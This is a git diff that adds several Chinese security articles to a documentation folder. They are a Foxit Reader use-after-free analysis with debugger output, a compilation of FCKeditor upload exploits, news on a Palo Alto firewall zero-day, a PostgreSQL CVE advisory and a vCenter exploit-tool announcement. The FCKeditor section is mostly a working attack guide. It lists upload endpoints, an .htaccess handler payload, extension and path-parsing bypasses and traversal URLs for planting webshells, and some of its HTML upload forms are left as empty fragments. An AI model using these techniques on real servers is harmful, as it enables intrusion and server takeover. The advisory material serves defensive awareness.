object가 재사용될 때 use-after-free 취약점 발생함 + // 재사용하는 부분 PoC 코드 정확하게 공개되지 않음 + +} + +function delete_pages(arg1, arg2, arg3) { + +  app.activeDocs[0].deletePages(); +  app.activeDocs[0].deletePages(); + +} +``` + + +addField()函数执行后创建的易受攻击的缓冲区 ( ) +0x18bbf0e0是: + +``` +0:000> p +eax=18babf00 ebx=076fe0dc ecx=175db036 edx=00000001 esi=00000002 edi=16426750 +eip=01b0fc8b esp=076fdcfc ebp=076fdd50 iopl=0         nv up ei pl nz na po nc +cs=0023  ss=002b ds=002b es=002b fs=0053  gs=002b efl=00200202 +FoxitPDFReader!std::basic_ostream >::operator<<+0x5069db: +01b0fc8b 8bf8 mov edi,eax +0:000> dd eax +18babf00 0c8cb610 18bbf0e0 18bbf0b0 00000000 +18babf10 00000000 00000000 00000000 00000000 +18babf20 00000000 00000000 00000000 00000000 +18babf30 00000000 00000000 00000000 00000000 +18babf40 00000000 00000000 00000000 00000000 +18babf50 00000000 00000000 00000000 00000000 +18babf60 00000000 00000000 00000000 00000000 +18babf70 00000000 00000000 00000000 00000000 +0:000> dd 18bbf0e0 ;<----------------------------------- (3) +18bbf0e0 00000003 00000000 0c8cb610 18bbf0b0 +18bbf0f0 00000000 18b92af8 00000001 00000001 +18bbf100 00000000 00000004 00000000 00000000 +18bbf110 00000000 18bb7c08 18bb7c20 18bb7c38 +18bbf120 18bb7c50 18bbe280 18bbe2a0 18bb7c68 +18bbf130 18bbe2c0 18bb7c80 18ba1c78 18bbe2e0 +18bbf140 18bb7c98 18bb7cb0 18bb7cc8 18bb7ce0 +18bbf150 18bb7cf8 18bb7d10 18bb7d28 18bb7d40 +``` + + +deletePages()函数执行后,缓冲区按如下方式释放:(8)表示分配状态,(9)表示解除分配状态。 + +``` +0:000> dd esi ;<----------- (8) +18bbf0e0 00000003 00000000 0c8cb610 1c789aa0 +18bbf0f0 00000000 18b92af8 00000000 00000002 +18bbf100 00000000 00000004 00000000 00000000 +18bbf110 00010006 18bbf0b0 00000000 00000000 +18bbf120 00000000 1c7711a0 00000010 00000002 +18bbf130 18bb9cbc 18bb9c98 0000000a 18bbe2e0 +18bbf140 00010006 18bbf0b0 00000000 00000000 +18bbf150 00000000 1c7711e0 00000010 00000001 +0:000> p +eax=00000000 ebx=076fcfe4 ecx=175da3be edx=075dd000 esi=18bbf0e0 edi=0c8cb610 +eip=01ed24bf esp=076fcf6c ebp=076fcfc4 iopl=0         nv up ei pl nz na pe nc +cs=0023  ss=002b ds=002b es=002b fs=0053  gs=002b efl=00200206 +FoxitPDFReader!safe_vsnprintf+0x37768f: +01ed24bf 83c404 add esp,4 +0:000> dd esi ;<----------- (9) +18bbf0e0 00000000 00000000 0c8cb610 1c789aa0 +18bbf0f0 00000000 18b92af8 00000000 00000002 +18bbf100 00000000 00000004 00000000 00000000 +18bbf110 00010006 18bbf0b0 00000000 00000000 +18bbf120 00000000 1c7711a0 00000010 00000002 +18bbf130 18bb9cbc 18bb9c98 0000000a 18bbe2e0 +18bbf140 00010006 18bbf0b0 00000000 00000000 +18bbf150 00000000 1c7711e0 00000010 00000001 +``` + + +复选框对象被释放,然后 +bytestring由对象重新分配。 +0x18bbf0e0您可以看到一个新对象被分配到相同的地址(),如下所示。 + +``` +0:000> p +eax=ffffffff ebx=076fe0dc ecx=18bbf0e0 edx=075dd000 esi=00000001 edi=1c777df0 +eip=01b10022 esp=076fdcf8 ebp=076fdd50 iopl=0         nv up ei pl nz na pe nc +cs=0023  ss=002b ds=002b es=002b fs=0053  gs=002b efl=00200206 +FoxitPDFReader!std::basic_ostream >::operator<<+0x506d72: +01b10022 e849573d00 call FoxitPDFReader!safe_vsnprintf+0x38a940 (01ee5770) +0:000> dd ecx <------------------------ (10) +18bbf0e0 00000000 0000001f 0000001f 62626952 +18bbf0f0 435f6e6f 67657461 5f79726f 74736f50 +18bbf100 6e616353 6974704f 00736e6f 00000000 +18bbf110 00010006 18bbf0b0 00000000 00000000 +18bbf120 00000000 1c7711a0 00000010 00000002 +18bbf130 18bb9cbc 18bb9c98 0000000a 18bbe2e0 +18bbf140 00010006 18bbf0b0 00000000 00000000 +18bbf150 00000000 1c7711e0 00000010 00000001 +0:000> db ecx L28 +18bbf0e0 00 00 00 00 1f 00 00 00-1f 00 00 00 52 69 62 62  ............Ribb +18bbf0f0 6f 6e 5f 43 61 74 65 67-6f 72 79 5f 50 6f 73 74  on_Category_Post +18bbf100 53 63 61 6e 4f 70 74 69 +``` + + +当复用 Checkbox 对象时, +0x18bbf0e0位于“缓冲区地址 ( ) + 0xc”的值 ( +0x62626952)被传递给 +this该对象(此处为寄存器)。 +esi最初,复选框对象中的值是一个指针,但当它被释放并 +0x62626952接受一个值时,就会发生访问冲突。 + +``` +0:000> p +(21e8.21f4): Access violation - code c0000005 (first chance) +First chance exceptions are reported before any exception handling. +This exception may be expected and handled. +eax=000008e0 ebx=00000000 ecx=00000066 edx=00000000 esi=62626962 edi=076fdcc4 +eip=02124612 esp=076fdc7c ebp=076fdc84 iopl=0         nv up ei pl zr na pe nc +cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210246 +FoxitPDFReader!safe_vsnprintf+0x5c97e2: +02124612 f77608 div eax,dword ptr [esi+8] ds:002b:6262696a=???????? +``` + + +取消分配复选框对象后,攻击者bytestring可以分配一个对象,从而可能允许读取和写入任意地址。这种可能性可能会导致远程代码执行。 + + +**参考** +- https://nvd.nist.gov/vuln/detail/CVE-2024-28888 + + + +感谢您抽出 + +![](https://mmbiz.qpic.cn/mmbiz_gif/Ljib4So7yuWgdSBqOibtgiaYWjL4pkRXwycNnFvFYVgXoExRy0gqCkqvrAghf8KPXnwQaYq77HMsjcVka7kPcBDQw/640?wx_fmt=gif "") + +. + +![](https://mmbiz.qpic.cn/mmbiz_gif/Ljib4So7yuWgdSBqOibtgiaYWjL4pkRXwycd5KMTutPwNWA97H5MPISWXLTXp0ibK5LXCBAXX388gY0ibXhWOxoEKBA/640?wx_fmt=gif "") + +. + +![](https://mmbiz.qpic.cn/mmbiz_gif/Ljib4So7yuWgdSBqOibtgiaYWjL4pkRXwycU99fZEhvngeeAhFOvhTibttSplYbBpeeLZGgZt41El4icmrBibojkvLNw/640?wx_fmt=gif "") + +来阅读本文 + +![](https://mmbiz.qpic.cn/mmbiz_gif/Ljib4So7yuWge7Mibiad1tV0iaF8zSD5gzicbxDmfZCEL7vuOevN97CwUoUM5MLeKWibWlibSMwbpJ28lVg1yj1rQflyQ/640?wx_fmt=gif "") + +**点它,分享点赞在看都在这里** + diff --git a/doc/Fckeditor编辑器漏洞汇集.md b/doc/Fckeditor编辑器漏洞汇集.md new file mode 100644 index 00000000..a4e8671e --- /dev/null +++ b/doc/Fckeditor编辑器漏洞汇集.md @@ -0,0 +1,518 @@ +# Fckeditor编辑器漏洞汇集 +原创 simeon的文章 小兵搞安全 2024-11-16 13:37 + +1.1Fckeditor简介 + +FCKeditor(现在通常称为CKEditor)是一个开源的、基于JavaScript的内容编辑器。它最初由Frederico Caldeira Knabben开发,并于2003年首次发布。CKEditor旨在使Web开发者能够在其网站上添加富文本编辑功能,用户无需具备HTML知识即可创建和编辑内容。 +### 1.1.1主要特点 +- **所见即所得 (WYSIWYG) 编辑** +:CKEditor提供了一个可视化的编辑界面,允许用户直接在页面上进行编辑,效果与最终呈现出来的结果相同。 + +- **丰富的插件系统** +:支持通过插件扩展功能,如表格处理、图片上传、链接管理等。 + +- **跨浏览器兼容性** +:支持所有主流浏览器,包括Chrome, Firefox, Safari, Edge, 和 Internet Explorer。 + +- **高度可定制** +:界面、工具栏和功能都可以根据需要进行配置。 + +- **易于集成** +:可以通过简单的API调用集成到各种Web应用程序中。 + +- **强大的API** +:提供了一套完整的API,方便开发者对编辑器进行深度定制。 + +- **开源** +:采用GPL, LGPL 和 MPL三重许可模式,既适合个人使用也适合商业项目。 + +### 1.1.2使用场景 + +CKEditor广泛应用于各种需要富文本输入的场合,比如博客系统、CMS(内容管理系统)、论坛、在线文档编辑等。 +### 1.1.3发展历程 + +随着技术的发展,CKEditor经历了多次迭代更新,每个版本都带来了性能优化、新特性和安全性改进。例如,CKEditor 4 是一个成熟的版本,而 CKEditor 5 则引入了全新的架构,提供了更好的性能和更灵活的插件机制。 + +CKEditor 4下载地址: +https://ckeditor.com/ckeditor-4/download/#ckeditor-4-lts + +CKEditor 5下载地址: +https://ckeditor.com/ckeditor-5/download/ + +Fckeditor下载地址: + +https://sourceforge.net/projects/fckeditor/files/ +## 1.2Fckeditor历史漏洞 +### 1.2.1FCKEditor Core ASP 2.6.8 任意文件上传保护绕过漏洞 + +FCKEditor 2.6.8 ASP 版本在处理重复文件时没有正确验证文件扩展名。这使得攻击者可以绕过文件上传保护,上传任何扩展名的文件,可能导致任意代码执行。 + +1.漏洞详情 + +易受攻击的文件: commands.asp + +函数: FileUpload() + +易受攻击的代码: + +sFileName = RemoveExtension(sOriginalFileName) & "(" & iCounter & ")." & sExtension + +2.利用方法 + +空字符绕过: 攻击者可以使用空字符 (\0) 绕过扩展名验证。 + +IIS6 模式: 运行在 IIS6 上的应用程序可以使用 file.asp;gif 模式上传恶意文件。 + +3.解决方案 + +为了缓解此漏洞,需要修改 config.asp 文件以强制执行严格的文件扩展名验证。找到 config.asp 文件,位于你的 FCKEditor 安装目录中。 + +找到以下行: + +ConfigAllowedExtensions.Add "File", "Extensions Here" + +将其替换为: + +ConfigAllowedExtensions.Add "File", "^(Extensions Here)$" + +漏洞详情参考链接地址: + +https://www.exploit-db.com/exploits/23005 +### 1.2.2FCKeditor 所有版本任意文件上传漏洞 + +1.漏洞简介 + +FCKeditor 所有版本存在任意文件上传漏洞,攻击者可以通过此漏洞上传任意文件(如 PHP 脚本),从而在服务器上执行任意代码。漏洞详情参考链接地址 + +https://www.exploit-db.com/exploits/17644 + +2.漏洞利用步骤 + +(1)创建一个 .htaccess 文件: + +代码: + + + +SetHandler application/x-httpd-php + + + +(2)现在使用 FCKeditor 上传这个 .htaccess 文件。 + +http://target.com/FCKeditor/editor/filemanager/upload/test.html + +http://target.com/FCKeditor/editor/filemanager/browser/default/connectors/test.html + +(3)现在使用 FCKeditor 上传 shell.php.gif。 + +上传 shell.php.gif 后,文件名会自动变为 shell_php.gif。 + +(4)现在可以从服务器访问 shell。 + +http://target.com/anything/shell_php.gif +### 1.2.3FCKEditor Core 2.x 2.4.3 - 'FileManager upload.php' 任意文件上传漏洞 + +1.漏洞概述 + +FCKEditor  2.x 版本(特别是 2.4.3 及之前的版本)存在一个严重的安全漏洞,允许攻击者通过 FileManager 组件中的 upload.php 脚本上传任意文件,包括恶意的 PHP 脚本文件。这可能导致远程代码执行 (RCE),从而使攻击者能够完全控制服务器。 + +2.影响版本 + +FCKEditor 2.x <= 2.4.3 + +3.漏洞详情 + +在 FCKeditor/editor/filemanager/connectors/php/upload.php 文件中,存在一个文件上传功能,该功能没有正确地验证上传文件的类型和扩展名,导致攻击者可以通过以下方式绕过文件类型检查: + +(1)版本 2.0 - 2.2: + +在 upload.php 文件中,Type 参数的值没有进行严格的验证,可以传递任意值。 + +如果传递的 Type 值不在 File, Flash, Image 之中,系统不会加载相应的扩展名过滤规则,从而允许上传任意文件。 + +(3)版本 2.3.0 - 2.4.3: + +虽然增加了对 Type 参数的验证,但 Media 类型的扩展名过滤规则在 config.php 中未定义。 + +因此,攻击者可以通过设置 Type=Media 来绕过文件类型检查,上传任意文件。 + +4.利用方法 + +以下是一个简单的 HTML 表单,用于演示如何利用此漏洞上传任意文件: + +
+ +     + +     + +
+### 1.2.4FCKEditor Core - 'FileManager test.html' 任意文件上传漏洞 + +1.漏洞简介 + +FCKEditor 存在一个严重的安全漏洞,允许攻击者通过 FileManager 组件中的 test.html 文件上传任意文件,包括恶意的 PHP 脚本文件。这可能导致远程代码执行 (RCE),从而使攻击者能够完全控制服务器。 + +2.影响版本 + +FCKEditor 2.x 版本 + +3.漏洞详情 + +在 FCKeditor/editor/filemanager/connectors/test.html 文件中,存在一个文件上传功能,该功能没有正确地验证上传文件的类型和扩展名,导致攻击者可以通过以下方式绕过文件类型检查: + +任意文件上传: + +test.html 文件中的上传功能没有严格验证文件类型和扩展名,允许上传任意文件。 + +攻击者可以上传一个带有恶意代码的文件(如 shell.php),并在服务器上执行。 + +4.利用方法 + +以下是一个简单的 HTML 表单,用于演示如何利用此漏洞上传任意文件: + +
+ +     + +     + +
+### 1.2.5FCKEditor 2.0 <= 2.2 - 'FileManager connector.php' 任意文件上传漏洞 + +1.漏洞概述 + +FCKEditor 2.0 到 2.2 版本存在一个严重的安全漏洞,允许攻击者通过 FileManager 组件中的 connector.php 脚本上传任意文件,包括恶意的 PHP 脚本文件。这可能导致远程代码执行 (RCE),从而使攻击者能够完全控制服务器。 + +2.影响版本 + +FCKEditor 2.0 <= 2.2 + +3.漏洞详情 + +在 FCKeditor/editor/filemanager/connectors/php/connector.php 文件中,存在一个文件上传功能,该功能没有正确地验证上传文件的类型和扩展名,导致攻击者可以通过以下方式绕过文件类型检查: + +任意文件上传: + +connector.php 文件中的上传功能没有严格验证文件类型和扩展名,允许上传任意文件。 + +攻击者可以上传一个带有恶意代码的文件(如 shell.php),并在服务器上执行。 + +利用脚本下载地址: +https://www.exploit-db.com/exploits/1484 +## 1.3Fckeditor漏洞利用小结 +### 1.3.1FCKeditor重要信息收集 + +( +1 +) +FCKeditor +编辑器页 + +FCKeditor/_samples/default.html + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/icCXA7Jkf1VHdfelM9otbJ3Wb0XCdiacSicu93ZnTHulUp68YUMzTAdRFYcPblA2T46O89ylAcNUw5GCnjjtrCZWw/640?wx_fmt=png&from=appmsg "") + + + +( +2 +)查看编辑器版本 + +FCKeditor/editor/dialog/fck_about.html + +FCKeditor/_whatsnew.html + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/icCXA7Jkf1VHdfelM9otbJ3Wb0XCdiacSictBcgRwibFatWHBPHbkFrVQArnc02Rw7zKTsbWR6Fbk4TJFlwt5krRtQ/640?wx_fmt=png&from=appmsg "") + +(3)查看文件上传路径 + +fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/ + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/icCXA7Jkf1VHdfelM9otbJ3Wb0XCdiacSicOdk931MOVwGKFx1RaGsQqicsBBsuMmib1r2ZWfBLFEgNRkicdu0Lfo6nA/640?wx_fmt=png&from=appmsg "") + +(4).FCKeditor被动限制策略所导致的过滤不严问题 + +小于等于 +FCKeditor v2.4.3 +版本中 +File +类别默认拒绝上传类型: +html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm + +Fckeditor 2.0 <= 2.2 +允许上传 +asa +、 +cer +、 +php2 +、 +php4 +、 +inc +、 +pwml +、 +pht +后缀的文件 + +上传后它保存的文件直接用的 +$sFilePath = $sServerDir . $sFileName +,而没有使用 +$sExtension +为后缀,直接导致在 +win +下在上传文件后面加个 +. +来突破。 + +(5).利用2003路径解析漏洞上传网马 + +利用 +2003 +系统路径解析漏洞的原理,创建类似“ +1.asp +”目录,再在此目录中上传文件即可被脚本解释器以相应脚本权限执行。 + +fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp + +(6).FCKeditor PHP上传任意文件漏洞 + +影响版本 +: FCKeditor 2.2 <= FCKeditor 2.4.2 +, +FCKeditor +在处理文件上传时存在输入验证错误,远程攻击可以利用此漏洞上传任意文件。在通过 +editor/filemanager/upload/php/upload.php +上传文件时攻击者可以通过为 +Type +参数定义无效的值导致上传任意脚本。成功攻击要求 +config.php +配置文件中启用文件上传,而默认是禁用的。 + +将一下代码保存为 +html +文件,并修改 +action +后的地址为网站实际地址。 + +
+ +Upload a new file:
+ +
+ + + +
+ +(7).TYPE自定义变量任意上传文件漏洞 + +通过自定义 +Type +变量的参数,可以创建或上传文件到指定的目录中去,且没有上传文件格式的限制。 + +/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.asp + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/icCXA7Jkf1VHdfelM9otbJ3Wb0XCdiacSic6feMIBfd4OQNSib3c2wRfzLakQZklYT97tVicXKicGSpR1XibxzQgEW6XQ/640?wx_fmt=png&from=appmsg "") + +注意出现这个需要登录后台后再上传。 + +打开这个地址就可以上传任何类型的文件了, +Shell +上传到的默认位置是 +: + +http://www.URL.com/UserFiles/all/1.asp +, +"Type=all" +这个变量是自定义的,在这里创建了 +all +这个目录,而且新的目录没有上传文件格式的限制。比如输入 +: + +/FCKeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/asp/connector.asp + +网马就可以传到网站的根目录下。 + +(8).aspx版FCKeditor 新闻组件遍历目录漏洞 + +修改 +CurrentFolder +参数使用 + ../../ +来进入不同的目录 + +/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=aspx.asp + +根据返回的 +XML +信息可以查看网站所有的目录。 + +/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F + +(9)FCKeditor中test上传方式及sample上传 + +如果存在以下文件,打开后即可上传文件。 + +FCKeditor/editor/filemanager/browser/default/connectors/test.html + +FCKeditor/editor/filemanager/upload/test.html + +FCKeditor/editor/filemanager/connectors/test.html + +FCKeditor/editor/filemanager/connectors/uploadtest.html + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/icCXA7Jkf1VHdfelM9otbJ3Wb0XCdiacSicZWLsJic0V5f7xKq6rOXTlVxQWKVASmvvlzh4InH6Tuohwz2KI9oa6UQ/640?wx_fmt=png&from=appmsg "") + +sample上传地址: + +FCKeditor/_samples/default.html + +FCKeditor/_samples/asp/sample01.asp + +FCKeditor/_samples/asp/sample02.asp + +FCKeditor/_samples/asp/sample03.asp + +FCKeditor/_samples/asp/sample04.asp + +(10).FCKeditor 文件上传“.”变“_”下划线的绕过方法: + +上传的文件例如: +shell.php.rar +或 +shell.php;.jpg +会变为 +shell_php;.jpg +这是新版 +FCK +的变化。 + +提交 +1.php+ +空格就可以绕过去所有的,不过空格只支持 +win +系统 +linux +是不支持的( +1.php +和 +1.php+ +空格是 +2 +个不同的文件) + +(11)“.htaccess”文件图片上传。 + +通过一个 +.htaccess +文件调用 + php +的解析器去解析一个文件名中只要包含 +"haha" +这个字符串的任意文件,所以无论文件名是什么样子,只要包含 +"haha" +这个字符串,都可以被以 + php +的方式来解析,是不是相当邪恶,一个自定义的 +.htaccess +文件就可以以各种各样的方式去绕过很多上传验证机制,建一个 +.htaccess +文件,里面的内容如下: + + + +SetHandler application/x-httpd-php + + + +通过Fckeditor将其上传,然后再上传一个包含haha名称的木马文件,即可获取webshell。也可以将其修改为jpg,然后上传一个图片木马即可获取webshell。 + +(12) 突破建立文件夹 + +FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684 + +访问后会创建一个shell.asp及z的文件夹。 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/icCXA7Jkf1VHdfelM9otbJ3Wb0XCdiacSicgZs4trsyGuTXVYD3uFzBWdibicOPAO7wy0XreV1xeSMsibTJLQeG7hHnQ/640?wx_fmt=png&from=appmsg "") + +http://www.xxxx.com/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.xxxx.com/fckeditor/editor/filemanager/connectors/asp/connector.asp + +然后可以对image文件夹进行浏览及上传 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/icCXA7Jkf1VHdfelM9otbJ3Wb0XCdiacSic1lklvlRAQU5rCUIMv4mvaubIVAbhUjxuJ96pibk9FjoroQEdib5A0DQw/640?wx_fmt=png&from=appmsg "") + +FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp + +(13)常用上传地址 + +FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/ + +FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp + +FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com/fckeditor/editor/filemanager/connectors/php/connector.php + +FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com/fckeditor/editor/filemanager/connectors/asp/Fconnector.asp + + (ver:2.6.3 测试通过) + +JSP 版: + +FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp + +注意红色部分修改为FCKeditor 实际使用的脚本语言,蓝色部分可以自定义文 + +件夹名称也可以利用../..目录遍历,紫色部分为实际网站地址。 + +(13)列目录漏洞也可助找上传地址 + +修改CurrentFolder 参数使用 ../../来进入不同的目录,Version 2.4.1 测试通过 + +/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=shell.asp + +根据返回的XML 信息可以查看网站所有的目录。 + +FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F + +也可以直接浏览盘符: + +JSP 版本: + +FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F + +(14)FCK编辑器jsp版本漏洞 + +http://www.xxx.com/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFolder=%2F + +上传马所在目录 + +FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/ + +上传shell的地址: + +http://www.xxx.com/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector + +跟版本有关系.并不是百分百成功. 测试成功几个站. + +不能通杀.很遗憾. + +http://www.****.com/FCKeditor/editor/filemanager/browser/default/browser.html?type=File&connector=connectors/jsp/connector +## 1.3资产收集系统利用 + +FCKeditor/_samples/default.html + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/icCXA7Jkf1VHdfelM9otbJ3Wb0XCdiacSiczZ3GiczX7eMmvT1YUr8oa69qD21mzgbicjGBO01m4WVJIUkHcs6pePsA/640?wx_fmt=png&from=appmsg "") + +url_load:"/FCKeditor/" + + + + + diff --git a/doc/Palo Alto Networks 确认存在新的防火墙0day漏洞.md b/doc/Palo Alto Networks 确认存在新的防火墙0day漏洞.md new file mode 100644 index 00000000..b3bbb7ee --- /dev/null +++ b/doc/Palo Alto Networks 确认存在新的防火墙0day漏洞.md @@ -0,0 +1,68 @@ +# Palo Alto Networks 确认存在新的防火墙0day漏洞 +会杀毒的单反狗 军哥网络安全读报 2024-11-16 01:02 + +**导****读** + + + +在告知客户正在调查有关新的防火墙远程代码执行漏洞后,Palo Alto Networks 于周五证实,一种新的 +0day +漏洞正被用于攻击。 + +![](https://mmbiz.qpic.cn/mmbiz_jpg/AnRWZJZfVaFvIoENTT3CXNzouetA72jp6X8WSVDxxGBelDNy0E0Kew8tRQcWMkjINuaaQccfcfjgvBBs0zGatg/640?wx_fmt=jpeg&from=appmsg "") + + +Palo Alto Networks于 11 月 8 日发布了一份公告( +https://security.paloaltonetworks.com/PAN-SA-2024-0015 +),针对有关远程代码执行漏洞的说法,敦促客户确保对 PAN-OS +管理界面的访问是安全的。 + + +Palo Alto Networks 最初表示,尚未发现任何 +0day +漏洞被利用的迹象,但在周五,该公司更新了公告,称“已观察到利用未经身份验证的远程命令执行漏洞针对有限数量暴露在互联网上的防火墙管理接口的威胁活动”。 + + +目前还不清楚该漏洞是如何暴露的、谁利用了它、以及攻击的目标是谁。 + + +该漏洞尚未分配 +CVE 标识符,但其 CVSS 评分为 9.3,属于“严重级别”。 + + +Palo Alto +告诉客户,它正在开发补丁和威胁预防签名,希望很快发布。 +Palo Alto  +建议客户确保只能从受信任的 +IP 地址访问防火墙管理界面,而不能从互联网访问。 + + +Palo Alto +Networks 表示:“绝大多数防火墙已经遵循 Palo Alto Networks 和行业最佳实践。” + + +该安全公司指出,“如果管理界面访问仅限于 +IP,则利用的风险将大大限制,因为任何潜在攻击都首先需要对这些 IP 的特权访问。” + + +该公司认为 +Prisma Access 和 Cloud NGFW 产品不受影响。 + + +这并不是最近几天曝光的唯一一个 +Palo Alto 产品漏洞。美国网络安全机构 CISA 表示,它已经发现有三个影响 Palo Alto Networks Expedition +的漏洞已被利用。 + + +**新闻链接:** + +https://www.securityweek.com/palo-alto-networks-confirms-new-firewall-zero-day-exploitation/ + +![](https://mmbiz.qpic.cn/mmbiz_jpg/AnRWZJZfVaGC3gsJClsh4Fia0icylyBEnBywibdbkrLLzmpibfdnf5wNYzEUq2GpzfedMKUjlLJQ4uwxAFWLzHhPFQ/640?wx_fmt=jpeg "") + +扫码关注 + +军哥网络安全读报 + +**讲述普通人能听懂的安全故事** + diff --git a/doc/PostgreSQL数据库存在高危漏洞CVE-2024-10979(8.8).md b/doc/PostgreSQL数据库存在高危漏洞CVE-2024-10979(8.8).md new file mode 100644 index 00000000..e7cb0acb --- /dev/null +++ b/doc/PostgreSQL数据库存在高危漏洞CVE-2024-10979(8.8).md @@ -0,0 +1,41 @@ +# PostgreSQL数据库存在高危漏洞CVE-2024-10979(8.8) + 独眼情报 2024-11-16 08:41 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/KgxDGkACWnSo421EKic7n1NqR2Illia2B9h75PyrmmZBlqXO3mgIxNFSjgCWjKictRUsHuWZwib2MOwbQ6gn6pEjSw/640?wx_fmt=png&from=appmsg "") + +PostgreSQL发现严重安全漏洞,可能导致数据泄露和系统被入侵 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/KgxDGkACWnSo421EKic7n1NqR2Illia2B98ggnlExZODzwFuxQd1bl9xcibpfDcdd0KmV79MoDTAfoHGneicaa2qmA/640?wx_fmt=png&from=appmsg "") + +Varonis安全研究团队的Tal Peleg和Coby Abrams发现了一个影响广泛使用的开源数据库系统PostgreSQL的高危漏洞。该漏洞被编号为CVE-2024-10979,可能会威胁到全球众多数据库的安全。 + +根据Varonis周五发布的研究报告,这个漏洞在CVSS评分系统中达到了8.8分的高危等级。值得注意的是,所有低于17.1、16.5、15.9、14.14、13.17和12.21版本的PostgreSQL都存在这一漏洞。 + +这个漏洞允许普通用户在PostgreSQL的PL/Perl扩展中操纵环境变量。需要说明的是,PL/Perl扩展是一个允许用户使用Perl语言编写数据库函数的工具。攻击者可以利用这个漏洞来操控运行数据库服务器上的环境变量。 + +PostgreSQL在其安全公告(https://www.postgresql.org/support/security/CVE-2024-10979/)中解释道:"PostgreSQL PL/Perl(https://www.postgresql.org/docs/current/plperl.html)中对环境变量的控制存在缺陷,使得普通数据库用户可以修改敏感的进程环境变量(如PATH)。即使攻击者没有数据库服务器操作系统用户权限,这种漏洞也足以让他们执行任意代码。" + +环境变量就像是控制程序运行的隐藏开关。攻击者通过修改这些变量,可能会执行恶意代码,最终窃取数据或控制整个系统。 + +更严重的是,环境变量有时会包含访问密钥或文件路径等敏感信息。攻击者可能会通过操纵这些变量来窃取数据库服务器中的重要信息。 + +要修复这个漏洞,建议立即将PostgreSQL更新到以下版本之一:17.1、16.5、15.9、14.14、13.17或12.21。这些更新版本已经修复了这个安全漏洞。 + +Varonis建议用户采取以下防护措施: +1. 更新PostgreSQL至最新小版本 + +1. 严格限制允许使用的扩展 + +1. 只向特定扩展授予CREATE EXTENSIONS权限 + +1. 将shared_preload_libraries配置参数设置为仅加载必需的库 + +完整的修复方案可以在这里(https://github.com/postgres/postgres/commit/b7e3a52a877cffb42ec7208232e30a8e44231e01)查看。 + +此外,建议限制用户安装数据库扩展的权限,防止攻击者利用漏洞,同时遵循最小权限原则,以降低可能造成的损失。 +> +> https://www.varonis.com/blog/cve-postgresql-pl/perl + + + + diff --git a/doc/Vcenter图形化漏洞利用工具.md b/doc/Vcenter图形化漏洞利用工具.md new file mode 100644 index 00000000..800c0745 --- /dev/null +++ b/doc/Vcenter图形化漏洞利用工具.md @@ -0,0 +1,60 @@ +# Vcenter图形化漏洞利用工具 + 黑白之道 2024-11-16 01:01 + +![](https://mmbiz.qpic.cn/mmbiz_gif/3xxicXNlTXLicwgPqvK8QgwnCr09iaSllrsXJLMkThiaHibEntZKkJiaicEd4ibWQxyn3gtAWbyGqtHVb0qqsHFC9jW3oQ/640?wx_fmt=gif "") + + +**1**► + +**工具介绍** + + +当前支持以下漏洞的检测,利用、命令执行还没写内容 + +CVE-2021-22005 + +CVE-2021-21972 + +CVE-2021-21985 + + +年初学习java时写了一个带命令执行和上传文件的,一直没什么机会用,本来不打算继续写的。 + +结果前段时间公司内部搞红蓝,还碰到了不少低版本的,命令行的有时候又很麻烦,还是喜欢无脑点点点的。 + +电脑上东西太多了,之前的好几个版本的源码懒得看哪个最新的,于是打算重新写一个,扔到这,随时能改。 + +预留了一些接口,后面每天抽空更新一些。如果有人想写,可以拿走自己写,记得点个star!!! + + +**2**► + +**工具展示** + + +**环境** + +jdk >= 11.0.1 + +![](https://mmbiz.qpic.cn/mmbiz_png/XoIcX2HtlUAszm8GeweuGRcKcbjJibicYL1C6HoTaicAXy3blEzbjrAKV2C4KydCkx7fvT7LicWlX83ydk8RQppXOg/640?wx_fmt=png&from=appmsg&wxfrom=13&tp=wxpic "") + + +**3**► + +**工具获取** + 